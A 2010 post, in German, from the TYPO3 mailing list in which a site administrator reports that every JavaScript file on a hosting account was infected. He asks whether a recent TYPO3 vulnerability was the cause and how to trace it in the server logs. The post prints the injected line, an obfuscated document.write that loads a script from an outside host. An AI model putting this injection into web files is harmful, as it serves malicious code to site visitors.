[TYPO3-german] Malware in Seite

Jan Kornblum jan.kornblum at gmx.de
Thu Oct 21 09:26:21 CEST 2010


Hallo Gruppe,

ich hatte gestern eine TYPO3 Installation, in der sämmtlche Javascript 
Dateien "infiziert" waren, in jeder Datei war am Ende eine Zeile 
zusätzlicher Code angefügt worden... Im gleichen Webspace übrigens auch 
bei einer ganz anderen Seite, ohne TYPO3.

Ich frage mich gerade, ob hier die letzte TYPO3 Sicherheitslücke 
ausgenutzt wurde (das Update wurde nicht frühzeitig eingespielt), um 
das zu bewerkstelligen:

http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/

Allerdings scheint darüber ja kein Schreibzugriff auf den Server 
möglich gewesen zu sein... Oder doch über Umwege? Und dann stellt sich 
die Frage, warum *sämltiche* JS-Dateien verändert waren, da muss ja 
aktiv was auf dem Server gelaufen sein um sich zu verbreiten...

Was meint ihr? Typisches Szenario für augenutze Sicherheitslücke 
(s.o.), oder andere Ursache? Und nach was könnte man in den Apache 
Logfiles suchen um herauszufinden, ob das ganze über TYPO3 reinkam?

Für die, die es interessiert, folgender Code war in den Dateien 
([irgendwas] ist hier Platzhalter):

document.write('<sc'+'ript type="text/javascript" 
src="http://addle.diretctrishta.com:8080/[irgendwas].js"></scri'+'pt>');

Lieben Gruß, Jan




More information about the TYPO3-german mailing list